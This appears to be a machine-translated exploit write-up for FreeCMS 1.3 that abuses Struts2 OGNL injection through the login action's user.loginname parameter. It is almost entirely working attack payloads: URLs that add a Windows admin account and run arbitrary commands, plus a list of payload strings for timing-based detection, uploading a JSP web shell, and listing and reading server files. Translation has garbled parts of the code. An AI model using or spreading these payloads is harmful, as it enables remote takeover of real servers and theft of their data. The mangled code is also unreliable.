Open-source free java CMS-FreeCMS1.3-Data Object-mail
Project address: https://code.google.com/p/freecms/
Submitted action:
Http: // localhost: 8080/ff/login_login.do? User. loginname = EXP
Add account:
http://localhost:8080/ff/login_login.do?user.loginname=%28%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D+new+java.lang.Boolean%28false%29,%20%23_memberAccess[%22allowStaticMethodAccess%22]%3d+new+java.lang.Boolean%28true%29,%20@java.lang.Runtime@getRuntime%28%29.exec('net%20user%20admin%20admin%20/add%27%29%29%28meh%29&z[%28user.loginname%29%28%27meh%27%29]=true
Run the following command:
http://localhost:8080/ff/login_login.do?user.loginname=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=%20new%20java.lang.Boolean(false),%23_memberAccess[%22allowStaticMethodAccess%22]=new%20java.lang.Boolean(true),%23req=@org.apache.struts2.ServletActionContext@getRequest(),%23exec=@java.lang.Runtime@getRuntime().exec(%23req.getParameter(%22cmd%22)),%23iswinreader=new%20java.io.DataInputStream(%23exec.getInputStream()),%23buffer=new%20byte[1000],%23iswinreader.readFully(%23buffer),%23result=new%20java.lang.String(%23buffer),%23response=@org.apache.struts2.ServletActionContext@getResponse(),%23response.getWriter().println(%23result))&z[(user.loginname)('meh')]=true&cmd=cmd%20/c%20set
Other EXP fragments
Var TEST_SLEEP_EXP = "('\ 43_memberaccess.allowstaticmethodaccess') (a) = true & (B) (' \ 43 context [\ 'xwork. methodAccessor. denyMethodExecution \ '] \ 75false') (B) & (' \ 43c ') (' \ 43_memberAccess.excludeProperties \ 75@java.util.Collections @ EMPTY_SET ') (c )) & (d) ('@ java. lang. thread @ sleep ([5000]) ') (d ))"; // Exp1 detects the vulnerability var TEST_SLEEP_EXP_2 = "'% 2b (% 23_memberAccess [\" allowStaticMethodAccess \ "] = true, @ java. lang. thread @ sleep ([5000]) % 2b '"; // Exp2 detects the vulnerability var TEST_SLEEP_EXP_3 =" % 28% 23 context [% 22xwork. methodAccessor. denyMethodExecution % 22] % 3D + new + java. lang. boolean % 28 false % 29, % 20% 23_memberAccess [% 22 allowStaticMethodAccess % 22] % 3d + new + java. lang. boolean % 28 true % 29, @ java. lang. thread @ sleep ([1, 5000]) (meh % 29 & z [% 28foo % 29% 28% 27meh % 27% 29] = true "// Exp3 detects the vulnerability var TEST_UPLOAD_SHELL =" ('\ u0023_memberAccess [\\' allowStaticMethodAccess \ ']') (meh) = true & (aaa) ('\ u0023context [\' xwork. methodAccessor. denyMethodExecution \ '] \ u003d \ u0023foo') (\ u0023foo \ u003dnew % 20java. lang. boolean (% 22 false % 22) & (i1) ('\ 43req \ 75@org.apache.struts2.ServletActionContext @ getRequest ()') (d) & (i12) ('\ 43xman \ 75@org.apache.struts2.ServletActionContext @ getResponse ()') (d) & (i13) ('\ 43xman. getWriter (). println (\ 43req. getServletContext (). getRealPath (% 22 \ u005c % 22) ') (d) & (i2) (' \ 43fos \ 75new \ 40java. io. fileOutputStream (new \ 40java. lang. stringBuilder (\ 43req. getRealPath (% 22 \ u005c % 22 )). append (@ java. io. file @ separator ). append (% 22system. jsp % 22 ). toString () ') (d) & (i3) (' \ 43fos. write (\ 43req. getParameter (% 22 t % 22 ). getBytes () ') (d) & (i4) (' \ 43fos. close () ') (d) & t = "; var test_execute_assist_exp =" (' \ 43_memberaccess.allowstaticmethodaccess') (a) = true & (B) ('\ 43 context [\' xwork. methodAccessor. denyMethodExecution \ '] \ 75false') (B) & (' \ 43c ') (' \ 43_memberAccess.excludeProperties \ 75@java.util.Collections @ EMPTY_SET ') (c )) & (g) ('\ 43req \ 75@org.apache.struts2.ServletActionContext @ getRequest ()') (d) & (h) ('\ 43webRootzpro \ 75@java.lang.runtime@getruntime(cmd.exe c (\ 43req. getParameter (% 22cmd % 22) ') (d) & (I) (' \ 43webRootzproreader \ 75new \ 40java. io. dataInputStream (\ 43webRootzpro. getInputStream () ') (d) & (i01) (' \ 43webStr \ 75new \ 40 byte [[100] ') (d )) & (i1) ('\ 43webRootzproreader. readFully (\ 43 webStr) ') (d) & (i111) (' \ 43webStr12 \ 75new \ 40java. lang. string (\ 43 webStr) ') (d) & (i2) (' \ 43xman \ 75@org.apache.struts2.ServletActionContext @ getResponse () ') (d) & (i2) ('\ 43xman \ 75@org.apache.struts2.ServletActionContext @ getResponse ()') (d) & (i95) ('\ 43xman. getWriter (). println (\ 43webStr12) ') (d) & (i99) (' \ 43xman. getWriter (). close () ') (d) & cmd = cmd % 20/c % 20 "; var test_execute_1__exp2 =" 1_c (% 23req. getParameter (% 22cmd % 22), % 23 iswinreader = new % 20java. io. dataInputStream (% 23exec. getInputStream (), % 23 buffer = new % 20 byte [[100], % 23iswinreader. readFully (% 23 buffer), % 23 result = new % 20java. lang. string (% 23 buffer), % 23 response = @ org. apache. struts2.ServletActionContext @ getResponse (), % 23response. getWriter (). println (% 23 result) % 2b '& cmd = cmd % 20/c % 20 "var TEST_GET_WEB_PATH =" (' \ 43_memberaccess.allowstaticmethodaccess') () = true & (B) ('\ 43 context [\' xwork. methodAccessor. denyMethodExecution \ '] \ 75false') (B) & (' \ 43c ') (' \ 43_memberAccess.excludeProperties \ 75@java.util.Collections @ EMPTY_SET ') (c )) & (g) ('\ 43req \ 75@org.apache.struts2.ServletActionContext @ getRequest ()') (d) & (i2) ('\ 43xman \ 75@org.apache.struts2.ServletActionContext @ getResponse () ') (d) & (i2) (' \ 43xman \ 75@org.apache.struts2.ServletActionContext @ getResponse () ') (d) & (i95) (' \ 43xman. getWriter (). println (\ 43req. getRealPath (% 22 \ u005c % 22) ') (d) & (i99) (' \ 43xman. getWriter (). close () ') (d) "; var TEST_GET_WEB_PATH2 ="' % 2b (% 23_memberAccess [% 22 allowStaticMethodAccess % 22] = true, @ org. apache. struts2.ServletActionContext @ getResponse (). getWriter (). println (@ org. apache. struts2.ServletActionContext @ getRequest (). getRealPath (% 22/% 22) % 2b '"; var TEST_FILES_LIST =" (' \ 43_memberaccess.allowstaticmethodaccess') (a) = true & (B) ('\ 43 context [\' xwork. methodAccessor. denyMethodExecution \ '] \ 75false') (B) & (' \ 43c ') (' \ 43_memberAccess.excludeProperties \ 75@java.util.Collections @ EMPTY_SET ') (c )) & (g) ('\ 43req \ 75@org.apache.struts2.ServletActionContext @ getRequest ()') (d) & (i2) ('\ 43xman \ 75@org.apache.struts2.ServletActionContext @ getResponse () ') (d) & (i95) (' \ 43xman. getWriter (). println (@ java. io. file @ listRoots () [fd_list]) ') (d) & (i99) (' \ 43xman. getWriter (). close () ') (d) "; // file traversal // var TEST_FILES_LIST =" (' \ 43_memberaccess.allowstaticmethodaccess') (a) = true & (B) ('\ 43 context [\' xwork. methodAccessor. denyMethodExecution \ '] \ 75false') (B) & (' \ 43c ') (' \ 43_memberAccess.excludeProperties \ 75@java.util.Collections @ EMPTY_SET ') (c )) & (g) ('\ 43req \ 75@org.apache.struts2.ServletActionContext @ getRequest ()') (d) & (i2) ('\ 43xman \ 75@org.apache.struts2.ServletActionContext @ getResponse () ') (d) & (i3) (' \ 43files \ 75new \ 40java. lang. stringBuilder (@ java. io. file @ listRoots () [4]. listFiles () [0]). append (% 22 [isDirectory] % 22 ). append (@ java. io. file @ listRoots () [4]. listFiles () [0]. isDirectory () ') (d) & (i95) (' \ 43xman. getWriter (). println (\ 43 files) ') (d) & (i99) (' \ 43xman. getWriter (). close () ') (d) "; // file traversal var TEST_GET_FILE_CONTENT =" (' \ 43_memberaccess.allowstaticmethodaccess') (a) = true & (B) ('\ 43 context [\' xwork. methodAccessor. denyMethodExecution \ '] \ 75false') (B) & (' \ 43c ') (' \ 43_memberAccess.excludeProperties \ 75@java.util.Collections @ EMPTY_SET ') (c )) & (g) ('\ 43req \ 75@org.apache.struts2.ServletActionContext @ getRequest ()') (d) & (i1) ('\ 43dis \ 75new \ 40java. io. dataInputStream (new \ 40java. io. fileInputStream (@ java. io. file @ listRoots () [[dname]. listFiles () [fname]) ') (d) & (i2) (' \ 43dos \ 75new \ 40java. io. dataOutputStream (@ org. apache. struts2.ServletActionContext @ getResponse (). getOutputStream () ') (d) & (i3) (' \ 43buff \ 75new \ 40 byte [[bsize] ') (d )) & (i4) ('\ 43dis. skipBytes (0) ') (d) & (i5) (' \ 43size \ 75 \ 43dis. read (\ 43 buff) ') (d) & (i6) (' \ 43dis. close () ') (d) & (i7) (' \ 43dos. writeInt (\ 43 size) ') (d) & (i95) (' \ 43dos. write (\ 43buff \ u002c0 \ u002c \ 43 size) ') (d) & (i99) (' \ 43dos. close () ') (d ))";